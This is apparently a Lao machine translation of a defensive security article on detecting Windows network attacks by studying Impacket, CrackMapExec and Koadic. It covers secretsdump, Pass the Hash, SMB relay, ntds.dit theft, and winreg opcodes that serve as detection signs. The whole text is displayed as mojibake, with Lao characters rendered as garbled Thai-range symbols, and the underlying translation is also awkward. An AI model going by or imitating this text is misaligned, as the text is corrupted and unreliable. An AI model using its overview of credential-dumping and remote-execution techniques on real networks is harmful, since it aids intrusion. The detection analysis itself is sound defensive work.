เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต

เบˆเปเบฒเบ™เบงเบ™เบ‚เบญเบ‡เบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เบ‚เบฐเปเบซเบ™เบ‡เบเบฒเบ™เบšเปเบฅเบดเบชเบฑเบ”เปเบกเปˆเบ™เป€เบžเบตเปˆเบกเบ‚เบถเป‰เบ™เปƒเบ™เปเบ•เปˆเบฅเบฐเบ›เบต: เบ•เบปเบงเบขเปˆเบฒเบ‡ เปƒเบ™เบ›เบต 2017, 13% เป€เบซเบ”เบเบฒเบ™เบ—เบตเปˆเป€เบ›เบฑเบ™เป€เบญเบเบฐเบฅเบฑเบเป„เบ”เป‰เบ–เบทเบเบšเบฑเบ™เบ—เบถเบเป„เบงเป‰ โ€‹เป€เบกเบทเปˆเบญโ€‹เบ—เบฝเบšโ€‹เปƒเบชเปˆโ€‹เบ›เบต 2016 โ€‹เปเบฅเบฐ โ€‹เปƒเบ™โ€‹เบ—เป‰เบฒเบโ€‹เบ›เบต 2018. 27% เป€เบซเบ”เบเบฒเบ™เป€เบžเบตเปˆเบกเป€เบ•เบตเบกเบเปˆเบงเบฒเปƒเบ™เป„เบฅเบเบฐเบ—เบตเปˆเบœเปˆเบฒเบ™เบกเบฒ. เบฅเบงเบกเบ—เบฑเบ‡เบœเบนเป‰เบ—เบตเปˆเป€เบ„เบทเปˆเบญเบ‡เบกเบทเป€เบฎเบฑเบ”เบงเบฝเบเบ•เบปเป‰เบ™เบ•เปเปเบกเปˆเบ™เบฅเบฐเบšเบปเบšเบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™ Windows. เปƒเบ™เบ›เบต 2017-2018, APT Dragonfly, APT28, APT Muddy Water โ€‹เป„เบ”เป‰โ€‹เบ—เบณโ€‹เบเบฒเบ™โ€‹เป‚เบˆเบกโ€‹เบ•เบตโ€‹เบ•เปเปˆโ€‹เบญเบปเบ‡เบเบฒเบ™โ€‹เบฅเบฑเบ”เบ–เบฐเบšเบฒเบ™ โ€‹เปเบฅเบฐโ€‹เบ—เบฒเบ‡โ€‹เบ—เบฐเบซเบฒเบ™โ€‹เปƒเบ™โ€‹เบขเบนโ€‹เป‚เบฃเบš, เบญเบฒโ€‹เป€เบกโ€‹เบฅเบดโ€‹เบเบฒโ€‹เป€เปœเบทเบญ โ€‹เปเบฅเบฐ Saudi Arabia. เปเบฅเบฐเบžเบงเบเป€เบฎเบปเบฒเป„เบ”เป‰เปƒเบŠเป‰เบชเบฒเบกเป€เบ„เบทเปˆเบญเบ‡เบกเบทเบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เบ™เบตเป‰ - Impacket, CrackMapExec ะธ เป‚เบ„เบญเบฒเบ”เบดเบ. เบฅเบฐเบซเบฑเบ”เปเบซเบผเปˆเบ‡เบ‚เบญเบ‡เบžเบงเบเป€เบ‚เบปเบฒเปเบกเปˆเบ™เป€เบ›เบตเบ”เปเบฅเบฐเบชเบฒเบกเบฒเบ”เปƒเบŠเป‰เป„เบ”เป‰เปƒเบ™ GitHub.

เบกเบฑเบ™เป€เบ›เบฑเบ™เบกเบนเบ™เบ„เปˆเบฒเบ—เบตเปˆเบชเบฑเบ‡เป€เบเบ”เบงเปˆเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเป€เบซเบผเบปเปˆเบฒเบ™เบตเป‰เบšเปเปˆเป„เบ”เป‰เบ–เบทเบเบ™เปเบฒเปƒเบŠเป‰เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เป€เบˆเบฒเบฐเป€เบšเบทเป‰เบญเบ‡เบ•เบปเป‰เบ™, เปเบ•เปˆเป€เบžเบทเปˆเบญเบžเบฑเบ”เบ—เบฐเบ™เบฒเบเบฒเบ™เป‚เบˆเบกเบ•เบตเบžเบฒเบเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™. เบœเบนเป‰เป‚เบˆเบกเบ•เบตเปƒเบŠเป‰เบžเบงเบเบกเบฑเบ™เบขเบนเปˆเปƒเบ™เบ‚เบฑเป‰เบ™เบ•เบญเบ™เบ•เปˆเบฒเบ‡เป†เบ‚เบญเบ‡เบเบฒเบ™เป‚เบˆเบกเบ•เบตเบซเบผเบฑเบ‡เบˆเบฒเบเบเบฒเบ™เป€เบˆเบฒเบฐเบ‚เบญเบ‡ perimeter. เบ™เบตเป‰, เป‚เบ”เบเบงเบดเบ—เบตเบ—เบฒเบ‡เบเบฒเบ™, เปเบกเปˆเบ™เบเบฒเบเบ—เบตเปˆเบˆเบฐเบเบงเบ”เบžเบปเบšเปเบฅเบฐเบกเบฑเบเบˆเบฐเบกเบตเบžเบฝเบ‡เปเบ•เปˆเบเบฒเบ™เบŠเปˆเบงเบเป€เบซเบผเบทเบญเบ‚เบญเบ‡เป€เบ•เบฑเบเป‚เบ™เป‚เบฅเบขเบต เบเบฒเบ™เบเปเบฒเบ™เบปเบ”เบฎเปˆเบญเบ‡เบฎเบญเบเบ‚เบญเบ‡เบเบฒเบ™เบ›เบฐเบ™เบตเบ›เบฐเบ™เบญเบกเปƒเบ™เบเบฒเบ™เบˆเบฐเบฅเบฒเบˆเบญเบ™เป€เบ„เบทเบญเบ‚เปˆเบฒเบ เบซเบผเบทเป€เบ„เบทเปˆเบญเบ‡เบกเบทเบ—เบตเปˆเบญเบฐเบ™เบธเบเบฒเบ”เปƒเบซเป‰ เบเบงเบ”เบžเบปเบšเบเบฒเบ™เบเบฐ เบ—เบณ เบ—เบตเปˆเบซเป‰เบฒเบงเบซเบฑเบ™เบ‚เบญเบ‡เบœเบนเป‰เป‚เบˆเบกเบ•เบตเบซเบผเบฑเบ‡เบˆเบฒเบเบ—เบตเปˆเบฅเบฒเบงเป„เบ”เป‰เป€เบ‚เบปเป‰เบฒเป„เบ›เปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™. เป€เบ„เบทเปˆเบญเบ‡เบกเบทเบชเบฐเบซเบ™เบญเบ‡เบซเบ™เป‰เบฒเบ—เบตเปˆเบซเบฅเบฒเบเบซเบฅเบฒเบ, เบˆเบฒเบเบเบฒเบ™เป‚เบญเบ™เป„เบŸเบฅเปŒเป„เบ›เบซเบฒเบเบฒเบ™เป‚เบ•เป‰เบ•เบญเบšเบเบฑเบšเบ—เบฐเบšเบฝเบ™เปเบฅเบฐเบเบฒเบ™เบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เปƒเบ™เป€เบ„เบทเปˆเบญเบ‡เบซเปˆเบฒเบ‡เป„เบเบชเบญเบเบซเบผเบตเบ. เบžเบงเบเป€เบฎเบปเบฒเป„เบ”เป‰เป€เบฎเบฑเบ”เบเบฒเบ™เบชเบถเบเบชเบฒเบเปˆเบฝเบงเบเบฑเบšเป€เบ„เบทเปˆเบญเบ‡เบกเบทเป€เบซเบผเบปเปˆเบฒเบ™เบตเป‰เป€เบžเบทเปˆเบญเบเปเบฒเบ™เบปเบ”เบเบดเบ”เบˆเบฐเบเปเบฒเป€เบ„เบทเบญเบ‚เปˆเบฒเบเบ‚เบญเบ‡เบžเบงเบเป€เบ‚เบปเบฒ.

เบชเบดเปˆเบ‡เบ—เบตเปˆเบžเบงเบเป€เบฎเบปเบฒเบˆเปเบฒเป€เบ›เบฑเบ™เบ•เป‰เบญเบ‡เป€เบฎเบฑเบ”:

  • เป€เบ‚เบปเป‰เบฒเปƒเบˆเบงเบดเบ—เบตเบเบฒเบ™ hacking เป€เบ„เบทเปˆเบญเบ‡เบกเบทเป€เบฎเบฑเบ”เบงเบฝเบ. เบŠเบญเบเบซเบฒเบชเบดเปˆเบ‡เบ—เบตเปˆเบœเบนเป‰เป‚เบˆเบกเบ•เบตเบ•เป‰เบญเบ‡เบเบฒเบ™เปƒเบŠเป‰เบ›เบฐเป‚เบซเบเบ” เปเบฅเบฐเป€เบ—เบฑเบเป‚เบ™เป‚เบฅเบเบตเปƒเบ”เบ—เบตเปˆเป€เบ‚เบปเบฒเป€เบˆเบปเป‰เบฒเบชเบฒเบกเบฒเบ”เปƒเบŠเป‰.
  • เบŠเบญเบเบซเบฒเบชเบดเปˆเบ‡เบ—เบตเปˆเบšเปเปˆเบ–เบทเบเบเบงเบ”เบžเบปเบšเป‚เบ”เบเป€เบ„เบทเปˆเบญเบ‡เบกเบทเบ„เบงเบฒเบกเบ›เบญเบ”เป„เบžเบ‚เปเป‰เบกเบนเบ™เปƒเบ™เบ‚เบฑเป‰เบ™เบ•เบญเบ™เบ—เปเบฒเบญเบดเบ”เบ‚เบญเบ‡เบเบฒเบ™เป‚เบˆเบกเบ•เบต. เป„เบฅเบเบฐเบเบฒเบ™เบชเบญเบ”เปเบ™เบกเบญเบฒเบ”เบˆเบฐเบ–เบทเบเบ‚เป‰เบฒเบกเป„เบ›, เบšเปเปˆเบงเปˆเบฒเบˆเบฐเป€เบ›เบฑเบ™เบเป‰เบญเบ™เบงเปˆเบฒเบœเบนเป‰เป‚เบˆเบกเบ•เบตเป€เบ›เบฑเบ™เบœเบนเป‰เป‚เบˆเบกเบ•เบตเบžเบฒเบเปƒเบ™, เบซเบผเบทเบเป‰เบญเบ™เบงเปˆเบฒเบœเบนเป‰เป‚เบˆเบกเบ•เบตเบเปเบฒเบฅเบฑเบ‡เบ‚เบธเบ”เบ„เบปเป‰เบ™เบ‚เบธเบกเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ—เบตเปˆเบšเปเปˆเบฎเบนเป‰เบกเบฒเบเปˆเบญเบ™. เบกเบฑเบ™เป€เบ›เบฑเบ™เป„เบ›เป„เบ”เป‰เบ—เบตเปˆเบˆเบฐเบŸเบทเป‰เบ™เบŸเบนเบฅเบฐเบšเบปเบšเบ•เปˆเบญเบ‡เป‚เบชเป‰เบ—เบฑเบ‡เบซเบกเบปเบ”เบ‚เบญเบ‡เบเบฒเบ™เบเบฐเบ—เปเบฒเบ‚เบญเบ‡เบฅเบฒเบง, เบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™เบ„เบงเบฒเบกเบ›เบฒเบ–เบฐเบซเบ™เบฒเบ—เบตเปˆเบˆเบฐเบเบงเบ”เบžเบปเบšเบเบฒเบ™เป€เบ„เบทเปˆเบญเบ™เป„เบซเบงเบ•เบทเปˆเบกเบญเบตเบ.
  • เบเปเบฒเบˆเบฑเบ”เบœเบปเบ™เบšเบงเบเบ—เบตเปˆเบšเปเปˆเบ–เบทเบเบ•เป‰เบญเบ‡เบˆเบฒเบเป€เบ„เบทเปˆเบญเบ‡เบกเบทเบเบงเบ”เบซเบฒเบเบฒเบ™เบšเบธเบเบฅเบธเบ. เบžเบงเบเป€เบฎเบปเบฒเบ•เป‰เบญเบ‡เบšเปเปˆเบฅเบทเบกเบงเปˆเบฒเปƒเบ™เป€เบงเบฅเบฒเบ—เบตเปˆเบเบฒเบ™เบ”เปเบฒเป€เบ™เบตเบ™เบเบฒเบ™เบชเบฐเป€เบžเบฒเบฐเปƒเบ”เบซเบ™เบถเปˆเบ‡เบ–เบทเบเบเบงเบ”เบžเบปเบšเบšเบปเบ™เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ reconnaissance เบ”เบฝเบง, เบ„เบงเบฒเบกเบœเบดเบ”เบžเบฒเบ”เป€เบฅเบทเป‰เบญเบเป†เปเบกเปˆเบ™เป€เบ›เบฑเบ™เป„เบ›เป„เบ”เป‰. เบ›เบปเบเบเบฐเบ•เบดเปเบฅเป‰เบงเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบกเบตเบˆเปเบฒเบ™เบงเบ™เบžเบฝเบ‡เบžเปเบ‚เบญเบ‡เบงเบดเบ—เบตเบเบฒเบ™, indistinguishable เบˆเบฒเบเบญเบฑเบ™เบ—เบตเปˆเบ–เบทเบเบ•เป‰เบญเบ‡เบขเบนเปˆ glance เบ—เปเบฒเบญเบดเบ”, เป€เบžเบทเปˆเบญเปƒเบซเป‰เป„เบ”เป‰เบฎเบฑเบšเบ‚เปเป‰เบกเบนเบ™เปƒเบ”เป†.

เป€เบ„เบทเปˆเบญเบ‡เบกเบทเป€เบซเบผเบปเปˆเบฒเบ™เบตเป‰เปƒเบซเป‰เบœเบนเป‰เป‚เบˆเบกเบ•เบตเบซเบเบฑเบ‡? เบ–เป‰เบฒเบซเบฒเบเบงเปˆเบฒเบ™เบตเป‰เปเบกเปˆเบ™ Impacket, เบซเบผเบฑเบ‡เบˆเบฒเบเบ™เบฑเป‰เบ™เบœเบนเป‰เป‚เบˆเบกเบ•เบตเป„เบ”เป‰เบฎเบฑเบšเบซเป‰เบญเบ‡เบชเบฐเบซเบกเบธเบ”เบ‚เบฐเบซเบ™เบฒเบ”เปƒเบซเบเปˆเบ‚เบญเบ‡เป‚เบกเบ”เบนเบ™เบ—เบตเปˆเบชเบฒเบกเบฒเบ”เป„เบ”เป‰เบฎเบฑเบšเบเบฒเบ™เบ™เปเบฒเปƒเบŠเป‰เปƒเบ™เป„เบฅเบเบฐเบ—เบตเปˆเปเบ•เบเบ•เปˆเบฒเบ‡เบเบฑเบ™เบ‚เบญเบ‡เบเบฒเบ™เป‚เบˆเบกเบ•เบตเบ—เบตเปˆเบ›เบฐเบ•เบดเบšเบฑเบ”เบ•เบฒเบกเบซเบผเบฑเบ‡เบˆเบฒเบ breaking perimeter เป„เบ”เป‰. เป€เบ„เบทเปˆเบญเบ‡เบกเบทเบˆเปเบฒเบ™เบงเบ™เบซเบผเบฒเบเปƒเบŠเป‰เป‚เบกเบ”เบนเบ™ Impacket เบžเบฒเบเปƒเบ™ - เบ•เบปเบงเบขเปˆเบฒเบ‡, Metasploit. เบกเบฑเบ™เบกเบต dcomexec เปเบฅเบฐ wmiexec เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เบซเปˆเบฒเบ‡เป„เบเบชเบญเบเบซเบผเบตเบ, secretsdump เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เป„เบ”เป‰เบฎเบฑเบšเบšเบฑเบ™เบŠเบตเบˆเบฒเบเบซเบ™เปˆเบงเบเบ„เบงเบฒเบกเบˆเปเบฒเบ—เบตเปˆเป€เบžเบตเปˆเบกเบˆเบฒเบ Impacket. เบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™, เบเบฒเบ™เบเบงเบ”เบชเบญเบšเบ„เบงเบฒเบกเบ–เบทเบเบ•เป‰เบญเบ‡เบ‚เบญเบ‡เบเบดเบ”เบˆเบฐเบเปเบฒเบ‚เบญเบ‡เบซเป‰เบญเบ‡เบชเบฐเบซเบกเบธเบ”เบ”เบฑเปˆเบ‡เบเปˆเบฒเบงเบˆเบฐเบฎเบฑเบšเบ›เบฐเบเบฑเบ™เบเบฒเบ™เบเบงเบ”เบžเบปเบšเบ‚เบญเบ‡เบญเบฐเบ™เบธเบžเบฑเบ™.

เบกเบฑเบ™เบšเปเปˆเปเบกเปˆเบ™เป€เบฅเบทเปˆเบญเบ‡เบšเบฑเบ‡เป€เบญเบตเบ™เบ—เบตเปˆเบœเบนเป‰เบชเป‰เบฒเบ‡เบ‚เบฝเบ™เบงเปˆเบฒ "Powered by Impacket" เบเปˆเบฝเบงเบเบฑเบš CrackMapExec (เบซเบผเบทเบžเบฝเบ‡เปเบ•เปˆ CME). เบ™เบญเบเบˆเบฒเบเบ™เบฑเป‰เบ™, CME เบกเบตเบซเบ™เป‰เบฒเบ—เบตเปˆเบเบฝเบกเบžเป‰เบญเบกเบชเปเบฒเบฅเบฑเบšเบชเบฐเบ–เบฒเบ™เบฐเบเบฒเบ™เบ—เบตเปˆเบ™เบดเบเบปเบก: Mimikatz เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เป„เบ”เป‰เบฎเบฑเบšเบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™เบซเบผเบท hashes เบ‚เบญเบ‡เป€เบ‚เบปเบฒเป€เบˆเบปเป‰เบฒ, เบเบฒเบ™เบ›เบฐเบ•เบดเบšเบฑเบ” Meterpreter เบซเบผเบท Empire เบ•เบปเบงเปเบ—เบ™เบชเปเบฒเบฅเบฑเบšเบเบฒเบ™เบ›เบฐเบ•เบดเบšเบฑเบ”เบซเปˆเบฒเบ‡เป„เบเบชเบญเบเบซเบผเบตเบ, เปเบฅเบฐ Bloodhound เป€เบ—เบดเบ‡เป€เบฎเบทเบญ.

เป€เบ„เบทเปˆเบญเบ‡เบกเบทเบ—เบตเบชเบฒเบกเบ—เบตเปˆเบžเบงเบเป€เบฎเบปเบฒเป€เบฅเบทเบญเบเปเบกเปˆเบ™ Koadic. เบกเบฑเบ™เปเบกเปˆเบ™เบ‚เป‰เบญเบ™เบ‚เป‰เบฒเบ‡เบšเปเปˆเบ”เบปเบ™เบกเบฒเบ™เบตเป‰, เบกเบฑเบ™เบ–เบทเบเบ™เปเบฒเบชเบฐเป€เบซเบ™เบตเบขเบนเปˆเปƒเบ™เบเบญเบ‡เบ›เบฐเบŠเบธเบกเบชเบฒเบเบปเบ™เบ‚เบญเบ‡เปเบฎเบเป€เบเบต DEFCON 25 เปƒเบ™ 2017 เปเบฅเบฐเบ–เบทเบเบˆเปเบฒเปเบ™เบเป‚เบ”เบเบงเบดเบ—เบตเบเบฒเบ™เบ—เบตเปˆเบšเปเปˆเปเบกเปˆเบ™เบกเบฒเบ”เบ•เบฐเบ–เบฒเบ™: เบกเบฑเบ™เป€เบฎเบฑเบ”เบงเบฝเบเบœเปˆเบฒเบ™ HTTP, Java Script เปเบฅเบฐ Microsoft Visual Basic Script (VBS). เบงเบดเบ—เบตเบเบฒเบ™เบ™เบตเป‰เป€เบญเบตเป‰เบ™เบงเปˆเบฒเบเบฒเบ™เบ”เปเบฒเบฅเบปเบ‡เบŠเบตเบงเบดเบ” off เบ—เบตเปˆเบ”เบดเบ™: เป€เบ„เบทเปˆเบญเบ‡เบกเบทเบ™เปเบฒเปƒเบŠเป‰เบŠเบธเบ”เบ‚เบญเบ‡ dependencies เปเบฅเบฐเบซเป‰เบญเบ‡เบชเบฐเบซเบกเบธเบ”เบ—เบตเปˆเบชเป‰เบฒเบ‡เบ‚เบถเป‰เบ™เปƒเบ™ Windows. เบœเบนเป‰เบชเป‰เบฒเบ‡เป€เบญเบตเป‰เบ™เบกเบฑเบ™เบงเปˆเบฒ COM Command & Control, เบซเบผเบท C3.

เบœเบปเบ™เบเบฐเบ—เบปเบš

เบเบฒเบ™เป€เบฎเบฑเบ”เบงเบฝเบเบ‚เบญเบ‡ Impacket เปเบกเปˆเบ™เบเบงเป‰เบฒเบ‡เบซเบผเบฒเบ, เบ•เบฑเป‰เบ‡เปเบ•เปˆเบเบฒเบ™เบชเบญเบ”เปเบ™เบกเบžเบฒเบเปƒเบ™ AD เปเบฅเบฐเป€เบเบฑเบšเบเปเบฒเบ‚เปเป‰เบกเบนเบ™เบˆเบฒเบเป€เบ„เบทเปˆเบญเบ‡เปเบกเปˆเบ‚เปˆเบฒเบ MS SQL เบžเบฒเบเปƒเบ™, เป€เบ•เบฑเบเบ™เบดเบเบเบฒเบ™เป„เบ”เป‰เบฎเบฑเบšเบ‚เปเป‰เบกเบนเบ™เบ›เบฐเบˆเปเบฒเบ•เบปเบง: เบ™เบตเป‰เปเบกเปˆเบ™เบเบฒเบ™เป‚เบˆเบกเบ•เบต SMB relay, เปเบฅเบฐเบเบฒเบ™เป„เบ”เป‰เบฎเบฑเบšเป„เบŸเบฅเปŒ ntds.dit เบ—เบตเปˆเบกเบต hashes เบ‚เบญเบ‡เบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™เบ‚เบญเบ‡เบœเบนเป‰เปƒเบŠเป‰เบˆเบฒเบเบ•เบปเบงเบ„เบงเบšเบ„เบธเบกเป‚เบ”เป€เบกเบ™. Impacket เบเบฑเบ‡เบ›เบฐเบ•เบดเบšเบฑเบ”เบ„เปเบฒเบชเบฑเปˆเบ‡เบซเปˆเบฒเบ‡เป„เบเบชเบญเบเบซเบผเบตเบเป‚เบ”เบเปƒเบŠเป‰เบชเบตเปˆเบงเบดเบ—เบตเบ—เบตเปˆเปเบ•เบเบ•เปˆเบฒเบ‡เบเบฑเบ™: WMI, Windows Scheduler Management Service, DCOM, เปเบฅเบฐ SMB, เปเบฅเบฐเบ•เป‰เบญเบ‡เบเบฒเบ™เบ‚เปเป‰เบกเบนเบ™เบ›เบฐเบˆเปเบฒเป€เบžเบทเปˆเบญเป€เบฎเบฑเบ”เปเบ™เบงเบ™เบฑเป‰เบ™.

เบ„เบงเบฒเบกเบฅเบฑเบš

เบฅเบญเบ‡เบกเบฒเป€เบšเบดเปˆเบ‡เป€เบฅเบทเปˆเบญเบ‡เบฅเบฑเบšเป†. เบ™เบตเป‰เปเบกเปˆเบ™เป‚เบกเบ”เบนเบ™เบ—เบตเปˆเบชเบฒเบกเบฒเบ”เป€เบ›เบปเป‰เบฒเบซเบกเบฒเบเบ—เบฑเบ‡เป€เบ„เบทเปˆเบญเบ‡เบˆเบฑเบเบ‚เบญเบ‡เบœเบนเป‰เปƒเบŠเป‰เปเบฅเบฐเบ•เบปเบงเบ„เบงเบšเบ„เบธเบกเป‚เบ”เป€เบกเบ™. เบกเบฑเบ™เบชเบฒเบกเบฒเบ”เบ–เบทเบเบ™เปเบฒเปƒเบŠเป‰เป€เบžเบทเปˆเบญเปƒเบซเป‰เป„เบ”เป‰เบชเปเบฒเป€เบ™เบปเบฒเบžเบทเป‰เบ™เบ—เบตเปˆเบซเบ™เปˆเบงเบเบ„เบงเบฒเบกเบˆเปเบฒ LSA, SAM, SECURITY, NTDS.dit, เบ”เบฑเปˆเบ‡เบ™เบฑเป‰เบ™เบกเบฑเบ™เบชเบฒเบกเบฒเบ”เป€เบซเบฑเบ™เป„เบ”เป‰เปƒเบ™เบ‚เบฑเป‰เบ™เบ•เบญเบ™เบ•เปˆเบฒเบ‡เป†เบ‚เบญเบ‡เบเบฒเบ™เป‚เบˆเบกเบ•เบต. เบ‚เบฑเป‰เบ™เบ•เบญเบ™เบ—เปเบฒเบญเบดเบ”เปƒเบ™เบเบฒเบ™เบ”เปเบฒเป€เบ™เบตเบ™เบ‡เบฒเบ™เบ‚เบญเบ‡เป‚เบกเบ”เบนเบ™เปเบกเปˆเบ™เบเบฒเบ™เบเบงเบ”เบชเบญเบšเบœเปˆเบฒเบ™ SMB, เป€เบŠเบดเปˆเบ‡เบ•เป‰เบญเบ‡เบเบฒเบ™เบฅเบฐเบซเบฑเบ”เบœเปˆเบฒเบ™เบ‚เบญเบ‡เบœเบนเป‰เปƒเบŠเป‰เบซเบผเบท hash เบ‚เบญเบ‡เบกเบฑเบ™เป€เบžเบทเปˆเบญเบ›เบฐเบ•เบดเบšเบฑเบ”เบเบฒเบ™เป‚เบˆเบกเบ•เบต Pass the Hash เป‚เบ”เบเบญเบฑเบ”เบ•เบฐเป‚เบ™เบกเบฑเบ”. เบ•เปเปˆเป„เบ›เปเบกเปˆเบ™เบเบฒเบ™เบฎเป‰เบญเบ‡เบ‚เปเปƒเบซเป‰เป€เบ›เบตเบ”เบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡ Service Control Manager (SCM) เปเบฅเบฐเป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เบเบฒเบ™เบฅเบปเบ‡เบ—เบฐเบšเบฝเบ™เบœเปˆเบฒเบ™ winreg protocol, เป‚เบ”เบเปƒเบŠเป‰เบ—เบตเปˆเบœเบนเป‰เป‚เบˆเบกเบ•เบตเบชเบฒเบกเบฒเบ”เบŠเบญเบเบซเบฒเบ‚เปเป‰เบกเบนเบ™เบชเบฒเบ‚เบฒเบ—เบตเปˆเบกเบตเบ„เบงเบฒเบกเบชเบปเบ™เปƒเบˆเปเบฅเบฐเป„เบ”เป‰เบฎเบฑเบšเบœเบปเบ™เป„เบ”เป‰เบฎเบฑเบšเบœเปˆเบฒเบ™ SMB.

เปƒเบ™เบฎเบนเบš. 1 เบžเบงเบเป€เบฎเบปเบฒเป€เบšเบดเปˆเบ‡เบงเปˆเบฒเปƒเบ™เป€เบงเบฅเบฒเบ—เบตเปˆเปƒเบŠเป‰ winreg protocol, เบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เปเบกเปˆเบ™เป„เบ”เป‰เบฎเบฑเบšเป‚เบ”เบเปƒเบŠเป‰เบฅเบฐเบซเบฑเบ”เบฅเบตเบˆเบดเบ”เบŠเบตเบ—เบตเปˆเบกเบต LSA. เป€เบžเบทเปˆเบญเป€เบฎเบฑเบ”เบชเบดเปˆเบ‡เบ™เบตเป‰, เปƒเบŠเป‰เบ„เปเบฒเบชเบฑเปˆเบ‡ DCERPC เบเบฑเบš opcode 15 - OpenKey.

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
เป€เบ‚เบปเป‰เบฒ. 1. เบเบฒเบ™เป€เบ›เบตเบ”เบฅเบฐเบซเบฑเบ”เบเบฒเบ™เบฅเบปเบ‡เบ—เบฐเบšเบฝเบ™เป‚เบ”เบเปƒเบŠเป‰ winreg protocol

เบ•เปเปˆเป„เบ›, เป€เบกเบทเปˆเบญเป„เบ”เป‰เบฎเบฑเบšเบเบฒเบ™เป€เบ‚เบปเป‰เบฒเป€เบ–เบดเบ‡เบ—เบตเปˆเบชเปเบฒเบ„เบฑเบ™, เบกเบนเบ™เบ„เปˆเบฒเบ–เบทเบเบšเบฑเบ™เบ—เบถเบเป„เบงเป‰เบ”เป‰เบงเบเบ„เปเบฒเบชเบฑเปˆเบ‡ SaveKey เบเบฑเบš opcode 20. Impacket เป€เบฎเบฑเบ”เปเบšเบšเบ™เบตเป‰เปƒเบ™เบฅเบฑเบเบชเบฐเบ™เบฐเบชเบฐเป€เบžเบฒเบฐ. เบกเบฑเบ™เบšเบฑเบ™เบ—เบถเบเบ„เปˆเบฒเบ•เปˆเบฒเบ‡เป†เปƒเบชเปˆเป„เบŸเบฅเปŒเบ—เบตเปˆเบกเบตเบŠเบทเปˆเป€เบ›เบฑเบ™ 8 เบ•เบปเบงเบญเบฑเบเบชเบญเบ™เบชเบธเปˆเบกเบ•เปเปˆเบ—เป‰เบฒเบเบ”เป‰เบงเบ .tmp. เบ™เบญเบเบˆเบฒเบเบ™เบฑเป‰เบ™, เบเบฒเบ™เบญเบฑเบšเป‚เบซเบฅเบ”เป„เบŸเบฅเปŒเบ™เบตเป‰เป€เบžเบตเปˆเบกเป€เบ•เบตเบกเป€เบเบตเบ”เบ‚เบถเป‰เบ™เบœเปˆเบฒเบ™ SMB เบˆเบฒเบเป„เบ”เป€เบฅเบเบฐเบ—เปเบฅเบต System32 (เบฎเบนเบš 2).

เบงเบดเบ—เบตเบเบฒเบ™เบเบงเบ”เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเปƒเบ™เป‚เบ„เบ‡เบชเป‰เบฒเบ‡เบžเบทเป‰เบ™เบ–เบฒเบ™เบ‚เบญเบ‡ Windows: เบเบฒเบ™เบชเบถเบเบชเบฒเป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฎเบเป€เบเบต
เป€เบ‚เบปเป‰เบฒ. 2. เป‚เบ„เบ‡โ€‹เบเบฒเบ™โ€‹เบชเปเบฒโ€‹เบฅเบฑเบšโ€‹เบเบฒเบ™โ€‹เป„เบ”เป‰โ€‹เบฎเบฑเบšโ€‹เบเบฐโ€‹เปเบˆโ€‹เบเบฒเบ™โ€‹เบˆเบปเบ”โ€‹เบ—เบฐโ€‹เบšเบฝเบ™โ€‹เบˆเบฒเบโ€‹เป€เบ„เบทเปˆเบญเบ‡โ€‹เบซเปˆเบฒเบ‡โ€‹เป„เบโ€‹เบชเบญเบโ€‹เบซเบผเบตเบโ€‹

